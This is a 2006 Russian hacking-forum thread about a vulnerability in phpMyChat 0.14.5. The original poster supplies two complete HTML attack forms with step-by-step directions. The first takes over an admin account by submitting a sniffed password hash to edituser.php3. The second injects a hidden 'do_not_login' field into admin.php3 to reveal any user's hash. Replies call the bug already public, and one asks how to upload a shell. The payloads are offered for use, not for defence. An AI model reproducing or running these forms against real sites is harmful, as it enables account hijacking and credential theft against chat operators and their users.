Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
уязвимость в phpMyChat 0.14.5 |
02.04.2006, 02:46
|
|
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092
Репутация:
6
|
|
уязвимость в phpMyChat 0.14.5
Привет! Я нашел уязвимость в phpMyChat 0.14.5 ,и более поздние версии (может ее и до меня нашли, но вроде я таких уязвимостей не встречал). Суть в том: можно изменить пасс админу (любому пользователю), можно зайти под него ником в чат.
Для этого надо знать его ник и хеш (хеш не надо расшифровывать).
Допустим, мы узнали с помощью снифера хеш админа. Изменим ему пасс. Вот код страницы
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML dir="LTR">
<HEAD>
<title>Книга посетителей</title>
<LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css">
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.1">
<!--
function get_focus()
{
window.focus();
document.forms['LoginForm'].elements['AUTH_USERNAME'].focus();
}
// -->
</SCRIPT>
</HEAD>
<BODY onLoad="if (window.focus) get_focus();">
<CENTER>
<BR>
<FORM ACTION="http://www.site.ru/chat/edituser.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm">
<P></P>
<INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="hidden" NAME="Link" VALUE="1">
<INPUT TYPE="hidden" NAME="LIMIT" VALUE="">
<TABLE BORDER=0 CELLPADDING=3 CLASS="table">
<TR>
<TD ALIGN="CENTER">
<TABLE BORDER=0>
<TR>
<TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH>
</TR>
<TR>
<TD VALIGN="TOP" NOWRAP>Ник :</TD>
<TD VALIGN="TOP">
<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Pr13raK" CLASS="ChatBox">
</TD>
</TR>
<TR>
<TD VALIGN="TOP" NOWRAP>Пароль :</TD>
<TD VALIGN="TOP">
<INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="310dcbbf4cce62f762a2aaa148d556bd" CLASS="ChatBox">
</TD>
</TR>
</TABLE>
<P>
<INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox">
</TD>
</TR>
</TABLE>
</FORM>
</CENTER>
</BODY>
</HTML>
Для этого в поле:<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его ник.
В поле <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его хеш.
Все сохраняем страницу в html и нажимаем "Войти" меняем пасс можно и ник и теперь мы админы. Если что-то не понятно пишите kalnin2006@yandex.ru или стучите в асю: 255553398.
Извините если что не понятно это моя первая уязвимость!!!
"The pirats of a network" www.pirats.jino-net.ru |
|
|
02.04.2006, 12:21
|
|
Banned
Регистрация: 23.02.2006
Сообщений: 112
Провел на форуме:
659109
Репутация:
37
|
|
хе-х, в этом " phpMyChat 0.14.5 " стока баг, что можно книгу написать... года 2-3 назад друг написал пхп скрипт через которую можно было кикнуть админа, стать модером и тд=)
на сколько я помню на античате есть видео по той баге которую ты описал, но и хеш не всегда можно узнать....
|
|
|
|
02.04.2006, 22:48
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
Дитё-инвалид вернулся!!! Ура!!!
=))))))))))))))))))))))))))
|
|
|
|
03.04.2006, 09:18
|
|
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092
Репутация:
6
|
|
Мне стали задавать вопрос: «Как узнать хеш админа, если он не появляется в чате?".
Узнать можно. И не только админа, а можно и любого модера или юзера. Вот код страницы:
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML dir="LTR">
<HEAD>
<title>Книга посетителей</title>
<LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css">
<SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.1">
<!--
function get_focus()
{
window.focus();
document.forms['LoginForm'].elements['AUTH_USERNAME'].focus();
}
// -->
</SCRIPT>
</HEAD>
<BODY onLoad="if (window.focus) get_focus();">
<CENTER>
<BR>
<FORM ACTION="http://www.site.ru/chat/admin.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm">
<P></P>
<P><SPAN CLASS="error">Неправильный ник или пароль.</SPAN></P><INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="hidden" NAME="Link" VALUE="">
<INPUT TYPE="hidden" NAME="LIMIT" VALUE="">
<TABLE BORDER=0 CELLPADDING=3 CLASS="table">
<TR>
<TD ALIGN="CENTER">
<TABLE BORDER=0>
<TR>
<TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH>
</TR>
<TR>
<TD VALIGN="TOP" NOWRAP>Ник :</TD>
<TD VALIGN="TOP">
<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Lady_Ann" CLASS="ChatBox">
</TD>
</TR>
<TR>
<TD VALIGN="TOP" NOWRAP>Пароль :</TD>
<TD VALIGN="TOP">
<INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox">
</TD<!-- INSERT -->
<INPUT type="hidden" name="do_not_login" value="false">
<!-- END INSERT -->
</TR>
</TABLE>
<P>
<INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox">
</TD>
</TR>
</TABLE>
</FORM>
</CENTER>
</BODY>
</HTML>
В строчке <INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= Пишем ник
В строчке <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="Lady_Ann" CLASS="ChatBox"> после VALUE= тоже пишем этот же ник. А не хеш.
Нажимаем "Вход" и видим, ник и пас в виде звездочек. Теперь просматриваем страницу в HTML и ищем строчку <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="342353564asas34523523" CLASS="ChatBox">
Теперь уже после VALUE= будет не ник, а хеш пользователя.
"The pirats of a network" www.pirats.jino-net.ru |
|
|
|
03.04.2006, 09:20
|
|
Участник форума
Регистрация: 05.07.2005
Сообщений: 116
Провел на форуме:
177092
Репутация:
6
|
|
!!!!!!!!!!!!!!!хе-х, в этом " phpMyChat 0.14.5 " стока баг, что можно книгу написать... года 2-3 назад друг написал пхп скрипт через которую можно было кикнуть админа, стать модером и тд=)
на сколько я помню на античате есть видео по той баге которую ты описал, но и хеш не всегда можно узнать....!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Здесь есть видеоно только не по этой баге.Видео о том, как вставлять в чате теги
|
|
|
|
03.04.2006, 09:49
|
|
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790
Репутация:
726
|
|
Последний раз редактировалось Barsik; 03.04.2006 в 09:53..
|
|
|
|
03.04.2006, 22:15
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
инвалид по-моему эта бага давно паблик и была найдена
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
26.03.2007, 08:43
|
|
Новичок
Регистрация: 21.05.2006
Сообщений: 20
Провел на форуме:
404362
Репутация:
35
|
|
А шел можно как нибудь залить ?
|
|
|
|
07.04.2007, 00:56
|
|
Познающий
Регистрация: 16.03.2007
Сообщений: 48
Провел на форуме:
293334
Репутация:
39
|
|
vot ya zaidy v chat i kyda mne vstavit etot Cod Stratichki?
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
